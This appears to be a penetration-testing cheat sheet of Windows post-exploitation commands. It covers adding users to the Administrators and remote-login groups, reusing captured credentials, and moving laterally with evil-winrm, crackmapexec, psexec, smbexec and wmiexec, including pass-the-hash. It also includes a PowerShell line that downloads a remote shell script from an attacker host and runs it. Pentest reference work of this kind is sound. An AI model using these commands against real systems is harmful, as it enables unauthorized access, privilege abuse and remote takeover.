TwitterBlog

Windows

Introduction

In this section, you will find several useful commands for the Post-Exploitation phase in Windows systems.

User

Creating a user

net user <USERNAME> <PASSWORD> /add

Add a user to a group

net localgroup Administrators <USERNAME> /add

Add a user to the RDP group

By default, you cannot log in as a user through RDP unless it is a member of the "Remote Management Users" group.

net localgroup "Remote Management Users" <USERNAME> /add

Powershell credentials and how to use them

If you have obtained some credentials and want to perform an action impersonating the actual account, you can use PowerShell.

# Storing the credentials as variables
$pass = ConvertTo-SecureString '<PASSWORD>' -asplaintext -force
$cred = New-Object System.Management.Automation.PSCredential('<USERNAME>', $pass)
# Launch a process
Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.7:5555/shell-admin.ps1')" -Credential $cred

Recursive Grep (Powershell)

There is not a grep command on the Windows system, but thanks to PowerShell we can achieve something similar.

Get-ChildItem -Recurse | Select-String "<STRING>" -List | Select Path
# Shorter version
dir -recurse *.* | sls -pattern "foobar" | select -unique path

Remote Command Execution

During a pentest, it is quite common to obtain credentials that can be used for getting access to other machines. However, most Windows machines will lack of CLI services like SSH to execute commands remotely. Nonetheless, there are other Windows services that can be used to perform the same actions.

WinRM

Port: 5985

Windows Remote Management (WinRM) is a protocol that allows systems to access and exchange management information. An attacker can use this protocol to obtain RCE.

In order to check who can use the WinRM Protocol run the following command.

(Get-PSSessionConfiguration -Name Microsoft.PowerShell).Permission
# If the service is disable, you can enable with the following command
Enable-PSRemoting -Force

During the session, the commands you type are executed on the remote computer, as if you were typing directly on the remote computer, but you can have only one interactive session at a time.

$pass = ConvertTo-SecureString '<PASSWORD>' -asplaintext -force
$cred = New-Object System.Management.Automation.PSCredential('<USERNAME>', $pass)
Enter-PSSession -Computername <IP> -Credential <CRENTIAL>

As an alternative, you can use tools like evil-winrm or crackmapexec to execute commands.

evil-winrm -u USERNAME {-p <PASSWORD> | -H <HASH>} -i TARGET_IP
crackmapexec winrm <IP> -d <Domain Name> -u <USER> {-H <HASH> | -p <PASSWORD>} -X 'whoami'

Remote Desktop (RDP)

Port: 3389

If the user is a member of the "Remote Management Users" group and port 3389 is available, an attacker with the users' credentials could connect to the victim's computer.

rdesktop -u <USER> -p '<PASSWORD>' <IP>
xfreerdp +compression +toggle-fullscreen +clipboard /cert-ignore /dynamic-resolution  /u:<USERNAME> /p:'<PASSWORD>' /v:IP

  • /dynamic-resolution: This allows us to change the size of the window, adjusting the resolution of the lens in the process.

  • /size: WIDTHxHEIGHT: Set a specific size for machines that do not automatically resize with /dynamic-resolution.

  • +clipboard: Enables the use of clipboards.

  • /drive:<LOCAL_DIRECTORY>,<SHARE_NAME>: Creates a shared drive between the attacking machine and the target.

Note: A useful directory to share is the /usr/share/windows-resources directory in Kali, because it contains several Windows tools like Mimikatz.

SMB

Port: 445

The SMB service can always allow an attacker to execute remote code against a windows system, as long as you have a valid account on that machine with sufficient permissions to create and run a service.

There are different tools that can achieve this goal, each one in its own way.

PSEXEC

Uploads to ADMIN$ a service binary with an arbitrary name. The obtained reverse shell is not interactive thus programs like PowerShell, vssadmin and plink will cause the service to fail.

Furthermore, there is a high probability of being detected by AVs or EDRs.

psexec.py [-hashes <LM:NT>] <DOMAIN>/<USERNAME>[:<PASSWORD]@<TARGET>

SmbExec

Creates a service in the same way as psexec but it does not drop any binary on the host so it is stealthier than psexec. However, it is still a non-interactive shell.

smbexec.py [-hashes <LM:NT>] <DOMAIN>/<USERNAME>[:<PASSWORD]@<TARGET>

Crackmapexec

# Execute Powershell
crackmapexec smb 10.10.10.10 -u '<username>' -p '<password>' -X '$PSVersionTable' 
# Excute command
crackmapexec smb 10.10.10.10 -u '<username>' -p '<password>' -x whoami 
# Pass-the-Hash
crackmapexec smb 10.10.10.10 -u '<username>' -H <NTHASH> -x whoami

WMiexec

It creates a semi-interactive shell without installing any service or agent, being the stealthiest of the before mentioned.

wmiexec.py [-hashes <LM:NT>] <DOMAIN>/<USERNAME>[:<PASSWORD]@<TARGET>

Last updated